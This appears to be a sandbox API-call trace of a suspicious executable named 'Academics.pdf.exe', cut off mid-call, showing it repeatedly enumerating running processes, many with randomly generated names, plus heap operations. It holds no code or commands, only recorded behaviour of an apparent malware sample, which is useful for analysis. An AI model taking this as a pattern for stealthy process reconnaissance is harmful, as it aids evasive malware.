[0319.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0319.830] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.831] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.832] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.833] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.834] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.834] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0319.835] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.836] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.837] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0319.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0319.838] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0319.839] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0319.840] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.841] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0319.841] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0319.842] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0319.843] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0319.844] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0319.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0319.845] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0319.846] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0319.847] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0319.848] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0319.849] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0319.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0319.850] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0319.851] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0319.852] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0319.853] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0319.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0319.854] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0319.855] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0319.856] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.857] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0319.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.858] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0319.859] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0319.860] CloseHandle (hObject=0x294) returned 1 [0319.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0319.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0319.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0319.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0319.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0319.860] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.860] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0319.860] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0319.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0319.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0319.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0319.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0319.860] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0319.861] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0319.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0319.863] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0319.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0319.864] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0319.865] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.866] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0319.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0319.867] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0319.868] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0319.869] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0319.870] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0319.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.871] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.872] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.873] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.874] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0319.875] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.876] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.877] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0319.878] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0319.879] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0319.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0319.880] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0319.881] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0319.882] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0319.883] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0319.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0319.884] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0319.885] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0319.886] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0319.887] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0319.888] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0319.888] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0319.889] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0319.890] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0319.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0319.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0319.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0319.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0319.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0319.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, 